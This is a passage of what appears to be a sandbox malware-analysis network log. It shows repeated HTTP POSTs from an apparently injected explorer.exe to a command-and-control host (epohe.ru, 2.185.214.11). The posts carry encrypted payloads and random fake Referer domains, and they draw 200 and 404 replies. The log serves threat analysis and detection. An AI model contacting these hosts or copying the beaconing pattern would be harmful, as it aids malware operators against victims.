11	192.168.2.6	49728	2.185.214.11	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 08:20:53.014969110 CEST	272	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://oydqaptimmqlwlr.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 264 Host: epohe.ru
Sep 2, 2024 08:20:53.014986038 CEST	264	OUT	Data Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 6f 41 ae 9e Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vuoAH.d\|Gw7dO2rAX@bF7u%/&LO-BJa~4AC;R+pZAE?;7fZ\|3 X/4!
Sep 2, 2024 08:20:55.344763041 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 06:20:54 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49729	2.185.214.11	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 08:20:55.353796959 CEST	268	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ubqxonkbwrw.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 141 Host: epohe.ru
Sep 2, 2024 08:20:55.353818893 CEST	141	OUT	Data Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 7f 25 b8 90 Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vu%E[tEzNE!vavm{"B+.9*
Sep 2, 2024 08:20:56.464382887 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 06:20:56 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	49730	2.185.214.11	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 08:20:56.472636938 CEST	270	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://llwvqfhgyhhpg.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 271 Host: epohe.ru
Sep 2, 2024 08:20:56.472665071 CEST	271	OUT	Data Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 40 48 be ed Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vu@HxL]S]`c*c]/y\_!]gl6X5MT%,D2#X#k9lJyeh\Y;X"u\{zr$TKy
Sep 2, 2024 08:20:57.632760048 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 06:20:57 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	49731	2.185.214.11	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 08:20:57.640642881 CEST	271	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://yinxmrewdxvvup.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 189 Host: epohe.ru
Sep 2, 2024 08:20:57.640660048 CEST	189	OUT	Data Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 51 4e b0 92 Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vuQNP^@$imKBdh1F}v;;*442nB&#2l1Y4^3i\mr
Sep 2, 2024 08:20:59.249829054 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 06:20:59 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	49733	2.185.214.11	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 08:20:59.257668972 CEST	270	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://iyfnrlbdswaun.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 157 Host: epohe.ru
Sep 2, 2024 08:20:59.257703066 CEST	157	OUT	Data Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 7e 19 d6 e2 Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vu~{Rtk\|7e/$5afA8qF+Z3q*T,
Sep 2, 2024 08:21:00.505430937 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 06:21:00 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	49734	2.185.214.11	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 08:21:00.513787031 CEST	271	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://glhjgpfospwhdw.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 154 Host: epohe.ru
Sep 2, 2024 08:21:00.513798952 CEST	154	OUT	Data Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 75 3f c1 e7 Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vuu?KMZw7ZRM'k_tA!F]C/D.<QbK
Sep 2, 2024 08:21:01.659632921 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 06:21:01 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	49735	2.185.214.11	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 08:21:01.669356108 CEST	268	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gcybmsqpemm.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 286 Host: epohe.ru
Sep 2, 2024 08:21:01.669368982 CEST	286	OUT	Data Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 74 2d a2 a0 Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vut-U@qTip]8x~L[-XOE;M%/%cH>#PToo@sZAPB4ruQv.@eHr=_i
Sep 2, 2024 08:21:03.300298929 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 06:21:03 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	49736	2.185.214.11	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 08:21:03.307833910 CEST	271	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ltleqvppjdrlod.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 229 Host: epohe.ru
Sep 2, 2024 08:21:03.307857037 CEST	229	OUT	Data Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 21 0f a0 f7 Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vu!bCXzAs%N5sk;ik!ed$"/F\rMV+m/6v1SgCYQl/r0Iip\
Sep 2, 2024 08:21:04.584748030 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 06:21:04 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	49737	2.185.214.11	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 08:21:04.828788042 CEST	271	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://atmipbdihgavjw.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 291 Host: epohe.ru
Sep 2, 2024 08:21:04.828809023 CEST	291	OUT	Data Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 7f 30 df e6 Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vu0?}Ljx0cMM;tjh24k.ZX.pTLyn D&@!E~S~oq@l.EH%
Sep 2, 2024 08:21:05.996436119 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 06:21:05 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	49738	2.185.214.11	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 08:21:06.005374908 CEST	269	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://lefbfksalyjs.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 282 Host: epohe.ru
Sep 2, 2024 08:21:06.005395889 CEST	282	OUT	Data Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 35 53 cb 90 Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vu5STM]NvmCc(B<IK=z-mAu3bhC#l##\|,t%^A_ Q_97z;~boyA^7e
Sep 2, 2024 08:21:07.153987885 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 06:21:06 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.6	49739	2.185.214.11	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 08:21:07.275456905 CEST	270	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wiitjtnnnvend.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 356 Host: epohe.ru
